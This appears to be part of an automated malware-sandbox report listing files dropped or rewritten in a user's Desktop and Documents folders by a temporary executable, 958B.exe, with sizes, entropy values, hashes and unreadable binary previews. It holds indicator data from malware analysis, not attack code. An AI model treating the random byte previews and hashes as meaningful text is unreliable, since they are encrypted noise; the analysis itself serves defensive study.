Preview:	GRXZD]..N6...gj.x.............%...8....8m..~7.a..........dYU\u..H.....)..J.q.7.+.I....u.-.6.'7r6\|..$"..E...w.\|.......q.{;.........W.."....).Qeg%..#.x(D..!j....$&...c.T.2.o....gqQTx....A.ru.s.nm.y25.nv>).O...].4Fe...An.2.MW..I.@r]._.1....E.]g+O.j.:...h#g."R....Z.....3.k.C....b.44a...5.A................c.!.......:.5+...N.l.,...+....PV.w.y.....8WjM..._...\<....[.p....O...1n.EzB.q3fa....Va...X....:Z.Iz6.a..D....#]....[....t.u...=.}...{......-..5..j....>Z....(.Ug...>..p....w....Hec.S.......P..U.@..e..&...A...#... .p..O..i0&_>by.He..B.v.7._5^#.....S.....jB.\|.\|l(...6...c?p.z.@3..W.....B..7.O.{...5.\......."6...]GCF....../.....P..6D%[ .1g.Z.x..p..~..H.....R ..\!Jy.)g.....k.q@$I`....J..... :.:.ND....@u..pi ..o&....z7.Pg\|.j:.._#..N.-w...`i`g..9.....E4...z)..?.M."j.....$:....M._..r..h....v.v...K. F.[S..`.\.z.v..NvJ...[..1$....(,G......}.. .....3.......o.Dr9...Tu,......<H...2.. ..L.O\|....k..i@......,.<.R.._B/..n.p.....V.Yy.`..._=

C:\Users\user\Desktop\GRXZDKKVDB\PALRGUCVEH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84539747441888
Encrypted:	false
SSDEEP:	24:/NP1YGC70KfLP2NIdHV+t9xiVOp7CnwbQZhZ5dKHbGhFn1xagbGabD:VPyX70QOfFiVOVCnwb6X5AKxRbrD
MD5:	4C42A4F3FBA2179801910B4D922D00D0
SHA1:	0B4CACDF921550931D22FB9D17FFE97134E3948B
SHA-256:	2B0B90814068DCCE7CAAF3E93261CAA270372B2CE114414630BA0A65F398BB27
SHA-512:	1AB04CCA30A3425DF1E875670B39C89B743088C5D5253E2715912D13882F86AEF01F3EAB08C3569CD90AAF19F511C55B022A8F3CDE73E27742FEFEB27F8E7EEE
Malicious:	false
Preview:	PALRG..:..P1.~u.Y...+..>O>...#..8..[}'.....8V.i.....w7S]..f./Zk...b.{...(.....F.a...3a'..]B.Y.....#X..a.w+.z:.sZ..>"6E#...<.SD.6..#.h.X..W.0c...#..q..:$.......o...I>..=....5....K..k.?9.._.hJ$.`..7..r%d.O....8..:..Hi..D.....C\|..C........,qKG....1q.zw.....hd.......U..$..o.q.........T..5!...qfY..+B"H...r.S...+Hx.....[C...I.OC.....}.)....8.g....C...o..O..w.3m0.Q.Z...w53n...(..N.X.h.!K..sa...2.;u.2.......1..6;R.I.b.f&...j....^ #..%..k...1...p.....n.{`....z.>..>.w\|!..........t...`].=.\|...Y.'....w..\.I[O...IJP.gQ'..... ......./..pju.......V.y....q[E!.A..#2..1[E...F........s..L...KuE...^..69....B..G.2...Nap@W.O.zX.u...0.`.<.F.9a..s.X)?S..E.M..._N.........X..KC..}.m...&Fn.}.......I..u...b......B...!.3(#..."......x.?...`...0.3.Vo...a.d..X..........>#A.s..v.it7.....C....&..#.k.QF..B.rK.....n..2a$.r......?2...8.....%.....!e'R.3I....P..k..l...H.t.5Lb......1.....$.#}6..0`km.,."...z.!.4,gY.7-#g.#..U#G..dh..9....../.........w'b.x=...9}rG.h.Y.'.

C:\Users\user\Desktop\GRXZDKKVDB\TQDFJHPUIU.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8392637365943045
Encrypted:	false
SSDEEP:	24:q5DwiDYEWj4dUc+ZWVW9RgDaBuOIjOogYvtqj8kn6xGIyv+g7bAJEv9vb+eeebGE:q5UMuq+ZE7quByopq8u6xGIy/qE1vbqS
MD5:	B2FF9BE7538BB78A047066AD55F069DB
SHA1:	F2248A32E115B1E9244C8D84652ACD0CFA520DAF
SHA-256:	97DF45C400E5E6A5EEB5E2D804760170493A79AA236621BA2D95E2F9665EB299
SHA-512:	227C1D2994A4B7FB00CC60E2132D79C0C58F1FF55C8CB8450D47128D00D888EFC67B4DC5D13021A175B4065E9D45430B134D1BA8DEEBE2A0EC7853A4D2E568A1
Malicious:	false
Preview:	TQDFJ_....N..Y...j wpLs......7.u1w....&.C.0.#Qe..<.oo....7RN........(.j..q^d.-.f.4&.7V..b.+.=...V..Q.]4......].....SZ..H..IZqJs.\..).w8...8....;.D....;..3..........Q.;./.NOdf..:M.vG;........C.y.k.z."..R{.3\|.y...`...M..O...h8......2..5...T.8.&..@)g$.41.bk\|......c.....O....O..rXoL.x.^n.G.\c.J$.E.n.<gn.IxoZ.<....p...a...;. ...c......%ln...t.L..%..9..~..(.c.m...L.24.~..=B<J.+.y.6...:.k.)+!....x.^s...u......sW.m`..<...B&....}H..'.d.C.....G.....lv..gk.h...8")5.?aw..B..U{y....5t.}..../.f.O....:......b..w.V.nz...a.....F....&M...{..b..IV...t...0gN.+c.(.z.]K..:v......[.hc..M&......fA.J.`...4.z.9C.4..a....{.X..{;.(.K.m.....heA.o....5#...T.j.[.+.~Q...........9.{.y0....D...2.a....Z;...G..U..rV[..6.......I}@...../t.5:..jb.`..h.n.^*..-...7.K.h...]......VK..q]...T!.m.s....."\|.z../}..P.[).}..0_0.....p^..P..I...:..3..........F....v7.\.a.J.0..>....].T.g\4...L....J.k...;..w............5SS+.X.2e...Y./........%.5$SkS..7...O.G.x( h..v....\....n...G..zc

C:\Users\user\Desktop\NYMMPCEIMA.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.829211102897957
Encrypted:	false
SSDEEP:	24:9av/Wr5j7IjNTh1OzMZ8bg/KtefONp2dFKsx5dRPwiH7PbBfCVDbGabD:9ag54jNyz2HiIfONM6s5dRIiHJfMDbrD
MD5:	5EE9AED103612DCF236059F9476568E1
SHA1:	A8CDFCCB92B94A80D55C60E0469DE540C5AB2EF3
SHA-256:	949A28AB231A661D9563AAB55DAB21D753E6B1F3D73C8424BEE47784555C3090
SHA-512:	38924D591BC5632CB8B5B1D5E09A63A759F5526807DFD53E475A4F2D34FD928486F64FE06510B34C09924612DDADE37181A9FC0352D97D21A51F22022797FC16
Malicious:	false
Preview:	NYMMP5....8w..].....t...."o.......wGp.,..).QS...q4..A..>X.......L9...&MU.O.D..M..s]....h7......n.Q./..qp!q.Z...+......?e(.M...h:l$.q.K0.3..z.d.....O.1...}:x..>\.9.......#.j...na....m.\|....s.`$N....F..e....063.p....\|....].}...c.w.....S.m..-jo..M..i{...n...S!..Fl....F..$VX.....+.:......[.h.P2..i5q. ;.U{K..\|..i..3_....._Q...>c.L.h[...\.Wl..Ds...q..k..^U....M.}7..l.eC...vxq(w....'8..........[...5...-..i...m......"..L..8.)...{_.28.VU.........._......8A....t..>m:.o....~..5. ...3.....g..p..u.....L...m..H...._......h......j...$....b.`)..p...........L..k.B...._.a.$.PO....w.r3.^..5.p....=..;..#....Jl.!....NDF4ah...s...G..q+TH.l.)......'....w-...`E%\1&i.Q.@..K...=.6...g.+......[...S...ED[.......A<.k.o.;.t.g..5...1.-w.Bp.$p...[%.>.. ...u.M..s.L1....re...U..Z......}.1...-.0'@U.k.R.+..n.E.(....n['0x.5.yy.sr^&=1%..P...G..@.... .1..%..~.TC.X.^.`,...&...(.I(....b........;i6....].C.U.8.."b/.y:.....j....2xq.[....mE..X..^..*...1.r.

C:\Users\user\Desktop\PALRGUCVEH.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.869231134176391
Encrypted:	false
SSDEEP:	24:CU6sIaAVTZhyZQfQVYc3UXJo4JUtW5FYKs+pTtFNqBSgdXFXyD1Ytzy8zbGabD:VIaAYZd2c3U/JUt5R7U6zNbrD
MD5:	7579FA70ED8EB6BB4F863C2E6865CA31
SHA1:	DC7EA81A88B9AE37A7B5C349563D144C03BBDDB3
SHA-256:	0C679365632F264EAB4F42BA5405EC434451FC6760B4299343049F8A1657747D
SHA-512:	D30252D58A3C876D571F4EBE07668A8CA41A3ABBB4401260859FB88DA4AB3835941FDF072EDF1394D9550F52A1B780A5D846AF7F40FF6E3097FEEDF67A79FBDD
Malicious:	false
Preview:	PALRG...#.....]......n...".H..K.......W..b@.y.(.....W..O..g.qMBa.P..h....qO......%i....#I_..lH....M\|...QB`.K{Y.z....x.jq............aHh..V....N....O9..%..N.\|-s.....\T..?....v..o....g..{[....WS..bc.N.r....`.<..3['4.e....B..=V..,.J...L.K....\|.zz..%...53.....Z.)...~.....T.}K......i}..W.[%A..Tf%$/G./..yr.A.].0./..{,..\|.I^Y..........E...>..S.<x&.^y....D....f.6...R..&..#...l.6....#..<...@BI.}2i......=[[R........k.9.\.4.u5S^`.>6..._Z..g.$.....?0...!@].d.Y....1j...5.6.....m.;.caF....&...q.E.y...}...o........V...g}....S....DLH(..Gp.>..S..A..j..\r...dK..%.xE.....4.Xr..........@.Vp.....w........9".?yg.......[^wd.2n..9.i...bb...F.+........aZ...9?-.\..J....%.A.QbL0.;_...r...G%.LR..y.;U4.l[...1.....q.......Q.W.p6..v..c..Q.NX..%f.<......W.$.C.O.j.FyG.Z...n.....t.`t\|.]...x..D..^.-c...c...%....V..e........Th....R5.U.D>..z5R...A.ZO.<.7.....z..s%##+.k....`1q...H_..v.....iy.@.w..J0o..u...b.>..y...A....-.{...G.\..n. W.I.T.........G..#..d}...+.

C:\Users\user\Desktop\PALRGUCVEH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843242266274266
Encrypted:	false
SSDEEP:	24:KbKtiJXu7Bxh7qJdcIqgNDLG6VgE3HJ9TNJed1Up+bJ2oZMs2/02FMbGabD:IJXcgJppVv595Xp+bAop2/bMbrD
MD5:	3E7FDC11B1F2DC0E49823787BD84FD9D
SHA1:	A5E4EB0ED586CA9C28FC66EB774EA68C5FBB957F
SHA-256:	52D5A79A03AFA685FFE1919E4C1B8AE72B91FDDC9012678197F6D306FA4283E8
SHA-512:	24DCF95273BF819F533BD17B0CDC66070322F9DDE12A5DC3A39F07E302AFCC98E164D7E0040E41C2A5E307169E91D9CC8AE45DE8D2AF9DC7F9CE065C9E5560F3
Malicious:	false
Preview:	PALRG...k..!d.P.8.\.....U.Lz..8.......\|..)....v...04..!..W.u.W.....hL...$.....).Uk...w...d....>.g.1...........8.I...^...4."...D......>..=.{f...iH..:.p.Z.o&.L..d&<s...p..!_u..s8...Hl.......ZO.[".2B...!..b.\.......G..+..(..X.JW....%8..q.....R.D...a....dN.uPT.{Q......"e.........D......Dq.v....:.....D.x......7.$.\..xUeZA..s.d..].\..(...S......znm...lX...1'.....p.dy.S....]..y].\|/..`.~.i!.B..[....v\|..hz$.zX.m.V..9...X.7nS%b}..."[.t.H.H...)...3V.O...H!...:........1.Er3,.R9..q......Or.b...qq.`..../..@.8......f....gn.....<.D....m..MD../.v..y..... E9.....5xl.mI....g......U.......V....t.......N.....m.8........IZr..f[..;....q.'...f.......Q...G8U....w..L..(...rJ...,Q.......9.&...w.^oc^..X....8.O....S....H.Vh"..\.I....v..G...M............N_.6c.,-H.6.7.....]...~..b..HO.bC8..{..q&..A.9........g `....S.....,.U..1.G.....U..i.6.t...CRx.....c.O..F.r.Q.......We}.t!]s..~..%h.7.kL..../.4..+.V6.w....>8q.A...*J.......x...~3<8...m[..(..q...5!..J...

C:\Users\user\Desktop\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848212069106558
Encrypted:	false
SSDEEP:	24:7nvJ1x9cAuAvfY3cIm+1F+tgTn7sAhKbpEa3GWQeI7cYTxpbGabD:jvJrVMcr+1F+tgTnWEazQeITxpbrD
MD5:	1F5D479F4BD3875FB5D12734093F13FF
SHA1:	92B80508B7FEE95DDBC651F390BF057AC8553CF1
SHA-256:	DB5B181A0853486C1FE38C08C951C2C13A6047D061BEE7517824B41F7342556C
SHA-512:	9C6AA0E8CEC96408BE958C382FAC6C014990D63CCF2074CF3B0B0FDF77B14C193776FE16118436DA9AEB64ED2775217D87281D59F720F1D56221C3C4171706EA
Malicious:	true
Preview:	TQDFJd7.J.O..(..+...a.j..!..!F.RL.b}./r.k.K.o......hE`.w(..NG..i...5$_....._......q.+....ow.\|.o.%...T.Fm.5D...z'...y..P&...,3.b.i..X.r.u..Q.<QP....n..K..~..U....{4_........;.._...\.8...`.`..S.=.]..&W..7..-...Y...r..U/......J.\..r])..Z..i.v..)qf..G.>..8...@..y..9k....s.#@Q(.K.>..k....vd.9.D.....V.0vg..3k.0<k.....5..c...`m....ZH.p]x...`.0..".I... .x..1.Am..g.,F.hs`3(.I.v$.....Bi..vM.c+4}.O....4.o^...m.....c<...\|.?.{ef..x....7....M6.Y.w."..Ks..Z..."....\|...1TMES...d.P..N......P...S...P3_...z..&.k.5xE...~Dp....X..=....Fb'..'0.O..W..Yg.p.h.T,..n...J.7"...9.....2....c.}....R`U#L.o...k=...kc2@..{.k(..h.v..@(.e...H.".1..4.YF....c..iJ...S.d.bL"..%..~."...:..'L.KpZKH(R..:.sr#...Y,.5.-.A8..pD.rR....J..1..0~.....h!....#..g8..o..L.b.}<........r.{U{.>....!.'h<.s.. 9...).....CAK..elz....##...mgc..EP....v..#...F...s....95ti/.{5...u....rg..[.fJ-......#...q.0..I.g....0.!p...(..d...v..(...t..\uWQc..V...\u.y...R.&..c./..~......(G...o.^...]\|.O.HK

C:\Users\user\Desktop\TQDFJHPUIU.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8459525763508235
Encrypted:	false
SSDEEP:	24:r3Ep0wTsGjJW8ZItqzhsggzkLzHnxtML9sEfjWQyKMfajFfEd27BGEDjbGabD:r3Emw5vsgYAzHQzWrKMfYdE+3brD
MD5:	88962346FAB51633575C887F4EFB79C5
SHA1:	300B86BDB2006422FE6DA835B975E7E5343E0AA9
SHA-256:	5409EB31BDD5638B2C44E1D8327EC5A289E9A689C17B93F2CA673FADB5861C36
SHA-512:	D4E3676DEDB815848AC235E1F9E9B51BC351DF27CF8D99C5A578B44D2FFCEC76A7109992194711662DC24F6B271588A34EA360891A74C2481016891D8749CAF6
Malicious:	false
Preview:	TQDFJ..g.'\|# <n=...w.....nd7?.p....z.....FeF.c]TpW...B...f..h]Kx..e/'..g._....S[..-e...I.%..P...i.#._P.}....).l..Q.o..o.C..s0a..,..t..k.S.y.Cg2.Z5G.y`>.\........f..>..(1...F......E5....tf^.........g.a...h...U...._.....`j.[\w.C.OR..).p.K....).....d..Fr..>.Dm..o...[.P.T.tq...x..`.?C.%...........2.b.L...e.p.$Hg..q....e<.cL...H[_hMt.).g%I.................I~..E....u.-.....JYm.....Y.%..Q.r..n.oW...&.i\|...?.x,..k.m.....$.'....=.......(....uu..?......5..wh.;..w....?#...?......".l#....yV..e..Z..M..W......[.....!.Z@.FL....[.;k...._.AD..o-.2.:%\|.. .~P"Q.l[......3+.5"DP..b7..'7.....Y..~.z.P5hQ.Mc.i..Q.EF.}.MC....y.{.%Q`.=r.S..C..w.....X...t...,....#.Zp@..?h:.....\.1..C.#."6~$.....`GC5.Y...Fn...{+{....&..6veqI..s.s../..j.D.? .9?M.u.a..6d..e..y.3....._..K.a../..H.w..\|..{Q" .....V...u.(*.w....5...2.Cg.....3..S.nf.Y..72....uB...2.E8.r.N{.9-.6.n....i........-j...J....Q.....)kF/.o...]...CAe3.].o...r`[_vU{E0...].N.-......X......7N..&#=.J..

C:\Users\user\Documents\BJZFPPWAPT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859762039184825
Encrypted:	false
SSDEEP:	24:ObHMC9+ad1odiBE3XugRCNg4L+D5O/aL8267T0qBXgTtaWKoscDn18tbGabD:0sC9r3oCE3XugRC24Lww/aI2QT04utgL
MD5:	B261C304DE03FB34D5A3A133AECEC250
SHA1:	06CDFC47CEE0A2C73F276EFB1FEE06CAACB83C2C
SHA-256:	B6D7F086F4486B795D5D250F5742F271CD398605EF8EE4071785354AD834A3E4
SHA-512:	62A11765D688D300D988027D291063CDCD0C016B98FE155B7A31E147F44E32F91DC81624745E6EC8A8657DB41648F90A097E1CFEA1CA8F94B1806BBC90D72EE9
Malicious:	false
Preview:	BJZFPFb6..0....~J..$.-U.....@...].....a..D ..j(.."..W.FUo..@..W..... ..I.T..#..s....U...Q..z...y.....D..........v..K.1..n7......x[`.....#.......d.,......C........P.>.p2t...XH..[...YHl2.0.,......x.!..+.8;.h....B;!2....7....g.@.D...8.....&.-..jP,I.G..n.1..P..{..........ouN.W...\|.I.#......d..KfV.........K.k..5;.M.b[..s5.......FBle..R..O....../.G.N.]j).3zh.jZ.&.V....+.F.4.oD...A...}.G...f.PJ..H.+5.A.9l'T..-x...J_.zd.F...`&[...~."8w8..4.xV;aeFkR...\..uCjz..S...k...7.]+q.y..~...l.C....,...}6s.w2....E..}. .......>.[.....fzk.L.........-u.>..=...N.3...ew.x.OJYDh.13..)q.........'.._Qr.v......8G..57....Y..."....<.(....._...b.w..~...F!..........`IJL....m.V....Id.....d6.... ...4n..!&..t.{J2[^....;(4.....qi>.j...H.........dr.].Pj.]...(<..M...3....sd..]....=....(W.Bj....I.o.p#..i...!A..D....,..C.Y...mi.H!~......%.r.FL<.g...@.u.....p'C5..n.<..k../.....z.9..oP-<.so..:........?.......9....}.Q2..su.i..d..>}. .~.R....{ .q7.l.:.".......).....B..x.

C:\Users\user\Documents\BJZFPPWAPT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.828045792505911
Encrypted:	false
SSDEEP:	24:BrPj7HVRykh4k1ljWQMgkrKPKtdyuulfl/5sJhP7VSZ7mBFaTLl2NAaqlWj8Rx4y:BrPjLVRt1laIkeCtdyuu0TT4Z7mBF6Lv
MD5:	700D374EC2AB171C891EF42422B454A3
SHA1:	7D3966ADA5875329125A261AD76D3DBAA2134D49
SHA-256:	4E88B5561EC97039B875D3C891CF2791DD17D5F5B8D762C9D13DACA584C2B6F4
SHA-512:	24C88AA771129D3F0E7BB601F8BD07F28BE50CA1C9CC6B45368D11E44C771F42CEA593D07DB49B5C57A7B2DC8E6E72885C053187BE5AFFE543F35EDB587E65FD
Malicious:	false
Preview:	BJZFP9.J.d.)X.d.M.$?[..2..w..kQ...s........1x.um.W. &m....?MCa...`X.........`J..f....h......].m.>.Ia..../.0..-.m.9.....'.F.O.ZP.....A.B....O(..#....1.W..4.W$......a..tvk....`.:..."/......o^..B.z..'.>7..[.o.....NQ_.:x..E..j.#.=..W.q3?.-<.C..md...=.3..FP...e.>S.0..{.>}LW4..4Ws.....(x.....i.q..B...R\H.Q.\|.O+..V..x.W]\$........I.Qo...I_...]po....xc..2...F..+.k..7...F......../U..{x.... er..$...I4}..'....j6.Z..T.4.....].X.N...mb..4..G..GLA..T...TZ=.k.Y.o.J.........KU..a....4X.......~.kXy?..w...K.}......&.F.Y.>.=....\m46Y...y.O..T......J.H-9y..>..\..A.]7.I.{.....=m.....E^#.!u.^..*..GtO.:..E..L..]..2.L.B.L6...?....xe{..d..c....".;L..R^3. $(....b.................."%_.8...\|...-SP~c.....s .^.$.).K.=.II?....A..m..;C...S..@.wz\.8...VV.lp-....-09.c..V.........E...P....P.)...+.E..8..Fc..V.S".`?{....W.hu.$..(.b..z'...o....D.u~....7..............i..4....N..2T.....3)..!...RLe....v.k...u.!..<.U..3...4.wR.e.:..%.q.R...%..g4V.....,.t.t"...[I..g?...T.....

C:\Users\user\Documents\BJZFPPWAPT\BJZFPPWAPT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852594172344651
Encrypted:	false
SSDEEP:	24:pXQY59qWemyNkHx0TL5+Xv8J/CwlrMXIaRC0tdjNBRyeFNtu07KSn7TbGabD:Rt3qTm3R0TEXkJ/CwlGDIidhLrNtu07x
MD5:	D58B6B7AB777CEAC067D535C53E8975C
SHA1:	B4FD35B17A01E48E010F71FFD3999F37010D0AC4
SHA-256:	6BA26ADE6EBD5A1051A4B4270715BE92CC3DDFEB87498F4C04BA2AFA56B539E0
SHA-512:	B6A494A775F5DED0B34B73E192C3AD0F3696D23AFF47369B29845DCD53146DAD6C5F743ACC8DEB535F4E54749010C0B67A66E7F184C1173B9DC907249314F2D1
Malicious:	false
Preview:	BJZFP\...(.>.....J..n.~.S.-..JT...!.e.....m....}.._-./..f.\..../.I....^....k<..$_.....r..,!...]mfCG:9/p.f[S(\|o.1..`.@5... .%.do...e..aA.Z.7.U..2. .."..j..xM.9.'v.....=/.m..Q....U....=...K.@.meEQ=.P...w..7....9.f>~.0 /=>...wnw._.mL....K.t.^.."@v.+..H..r,U.],..6..,..$!7.............1..E.s...Xs.~......vWE..N.Tbu.y..ac.w...%.......9..m..nW....]9.BfM....D.<..4+R....t...y..........g..\.]E.B..e.c%.\q_M.\F.}.7.4..{...M....>`9c....lc3.T.z..V........n..3.U5W.....q..C_U.}....2Oz..vw..B..=.2..#..y........n...Z..vz...p.'S.$.A....8Tx.....7......x.....G....$Bg..F.M..Q.\.,.y...#)D6.7.y.\v..y..9rT.?s..Li.9.uYs..T..z.....%.......M......P..<l..6...v.V..o....a.sv.{h..._7t.i'f...Y:.K..........Y...b.I ...k~3.?.D....YJei...d..S2.........=5.m.?Y..Z..+..5KN.. ......[...!.b\|G.........I?:.<.'x.....j...`.6.o.`.y.7..$.............3.....}..X..._..h?.@.\..SB@:b.NM).\|.L..sP..p.....v.7aO..A.................!.w..3."...0.@......QY:.B...p..y....^.....h6.y....-.DvW

C:\Users\user\Documents\BJZFPPWAPT\CZQKSDDMWR.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.86735891246623
Encrypted:	false
SSDEEP:	24:3kWvEpJyMCAEGdISV/E+JrB9Oki8aMWwnnJ2loV8iCVo9uBVIHgupQpbGabD:0a1v48+JrB97zznJWiCVoMBVIObrD
MD5:	E5ADCD6CB4E8557CDD36A9D4D1831210
SHA1:	14A4A39C86035B60ACBEAC2BC201CA90E69CAFC0
SHA-256:	4D012714AF416AFA4386292ED178D98F76FAF2ADD0D942AFC159120FFCDDF2F1
SHA-512:	CE10105A336FC9E4E61AAABB3E24418A5091C3752B9CB1228D4559AD845FA38C5FD9335952480B2BC33B809074CE261855A06B1B9F9D455C2DE2F3F67B8F4263
Malicious:	false
Preview:	CZQKS....u.k...+..)fK?e".S....X...... .....k.m[.q ..&...#9....;...}..#}.....HH................Px.6E........H.....[Q.o..R..k..0h.gI.+M.7Jai....ok..."W..?...p..k.j.t.=.2g.x..;m.\|.X`....f..j,oZ.U.:Jg...-.]..M..t..._.....-....>..U..3..,....LT...+.i..O.g.w<..0dT.a..]dPmp2.}4E..d.;.,\|..$....t.yS...0..T....r.C;.J+.6N...I.x..{v..^.K...tN=y......../..56...u.B...;.._._.U7..y.-....D...:..vJ{.\..V....L.:@CX.....W.X.....h).C...k.$...o..}.........4.&.8....G...../.U....2W.vn.PL.<.6...B..?.CLt.Rh..z....j.Y.5.TbA;../.g.a...t....u.#.. ............C.........6....L...c..X.%...iA....A..G.~#}a7.q..3.Ej-].....k....i...{(.\T<G..,u..y.......U}"G.`h....`..V.x&...25.8.......[R.....<-Xm.L..>.....q...?...w..S.0^....t.79..nYL.Y8...5...^.<..F..Pg.........p^..6.:.l..2.I..L..gg.C.%.=.....2..l..........}J.....r..5.~....16.Iq.....S.j...O...ME..n..$..'<...qvvR...B+...Uq...V..et........".&..]j..H.:<i%a..g..7>..WO.M..t.).z.i...n...Zz..VKN......K./.96l,....J....X..:

C:\Users\user\Documents\BJZFPPWAPT\EOWRVPQCCS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850561480896775
Encrypted:	false
SSDEEP:	24:0ZdKiXfAglmproCY1/MH+xmixaCwMoodX2LOeDDlStdCxveYgErQYyz0NSabGabD:CKgfAgU0CW/qixaChXIl8OIsyzuVbrD
MD5:	5C970C5B7618F35C127B2B4B24BF6683
SHA1:	9F753A5C89DBE85D41CDCF63D2104B50BAACD11B
SHA-256:	B13D500BAD3E3251DD30019BBD1E038586CD9076B77CACFA3BBAB1D4D2ECE4A6
SHA-512:	122B3FD9AFCDFA98782A05D5140CF66D111819E7529F0D26105B19E48FAD2C766CEEA5C78EAD48C374C717B4E063C6399F58B99491F54B5CC3B0F7CCFC26E8B9
Malicious:	false
Preview:	EOWRV9rl\|S....e#hs.!.S...K..{...i...z.3d...7........7.g...."....[@w...<..G...m..a...n..C.H..l ....%..~."..,.....1>X.Z...^%J^x(...>.J=.".7\|.{s8..g.i........U.z..n..f..._..X.\j.J...F....5....\|.f.WR.3......y..^..ba9R&CQ.>.KuOX.....5.D...7...T.+u.....k.F.L\.Sr..0.bt....... ..G}\|..{..5....m........r!..AvE...F.....WH......<......\.p./\|.v... FV..(...0.H4..[.q.(J....Gp.d.....`.....z.:....u...... Q..KH....,0pO...(..i..=..ll..0......~..O4{.....Y\|G..P$$..\.L..n.a15;o .c..EvN^..7..{.9...x.s.dZlx.X./0.8P.......`EE.....(l...:p.....u......L.Bt.}zb/...@S.+..B.B@..s..<.W.9.\|..c].%.....x........VBLb..w..`..&.a..f....-.Re=.q........Gh.0.....f.(....#.."..-.W.?...#K.V......N....SK]x....Wj$=..{.......].;....A...vwQ..].....*ME..t_s4.8..:...Z.y..).....=..<. ..R...\|..g:V$....~t..B....cugP.......w..k.Z.,E{,Y`m..d..z...Pq.Ez.Zu..s^..&C:"..%_.<.%.V/.yK...W..td......]'.'..........(...b..T.....4...t@..1.`...0.>..;g./.eH.]...8......o....)7.

C:\Users\user\Documents\BJZFPPWAPT\EWZCVGNOWT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864546698144065
Encrypted:	false
SSDEEP:	24:KU4/2PlqGfqkkTndkourBsp6PKgmm5eNTHZYfoOO3Jn9MMgbGabD:B9jfuGo0u6PK3/rZHOO3jMbbrD
MD5:	EFB0F86EFAD45DC48CA6144B49D7FE67
SHA1:	F32924C3ABDAE665A9DF472EB161686FA3EDABA5
SHA-256:	52686DBBD5A309FA6B526C36D6857E24E25346ED0293669DCEE84577920B12DF
SHA-512:	5204FE7FC716FAEEEE07D1A1AE8DD2CF9CD398328CBDB785D563402F91A93670E43078375550B3DF3812C33C1A7D84D2910A81C3EAFFEF307B21139336C63894
Malicious:	false
Preview:	EWZCV.4^.+..<...=-D./..W.s$M!..p.J...Yh...G..>..&...`.........H"H.....P....l.......0W...Q.^Zd..Q..%l.p.....^6".:.g.=....].L..Z._N.H...0l..r.b.)>....W..b..a.ER...d..(...r1..F.....i.........0..p..K.Z{9..y....W#3..bE.......vo.Z.A...'.......&...Q...S=9.X..uC.../..I!.av~u.u.TCJ...A(.....pf:w.4".{....o....IC..?Q.'g...}...........bJ.Z.,.\...].M..S..i.`#93.)$.J..3..r..fn.85..A.D.P;.[..n...r.5.5.........J..4P..m.#..e.e.G.1x...}...rm...9.P.]..../....+.(.@..3....fQE...$.[.F@q.e......H(wi......Y'[/\|k8...m`..X....<..2;.[.....>.<...R....,J...Y."k.L~..!\|1.{.=..cFe..6...E.._.."(c.]m.q......>R...z....#.4...K....m...Uk6x........R..G..&....j...{.'a.@r......:&...Y.{.+8.;5Z....n.JV...{t.c6..\@Ai...H.#.z.v....cs..2J$.=L.j.KW8....9'.....!K.!.....]..v...).........6...Hd..3.n.(os.X..q....(......<.C.0..#.'W...c.H...v[9.k.MX.....k...O..[..-.h..6..t.N.ew...C..<.#F.l..a...$t..o......:.T.G......b.S`.V..Y..&..(..r..u.eIe.zGe...[..L..g..}K..O..~...Q'.]..].i..3......

C:\Users\user\Documents\BJZFPPWAPT\NYMMPCEIMA.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8572199780825365
Encrypted:	false
SSDEEP:	24:/sbiUyJzUxqGtGRuUNGzAi2z2tU/Hssv2/vX+zPl1qpZbGabD:/sRgIxqGHoCtU/HssKvXAqZbrD
MD5:	160DB9F41D1E83B88450805B5C200FB6
SHA1:	9C4C968A49586AEEAB3142CAE1DA84AA93A90A78
SHA-256:	45187AD026E71B82F237BEBF909D6BB461F256CA8804BD6F4BBB2B9B40CEBD98
SHA-512:	D0DF17E1B81DCA06F513E4B9097C3F18B40242E4208E1C60D0E76E9EABD8F8D3E6E6C0B44AC709201FE3DC2683C3C144A9BBD323F64422D7D7A19CB3FDF94C21
Malicious:	false
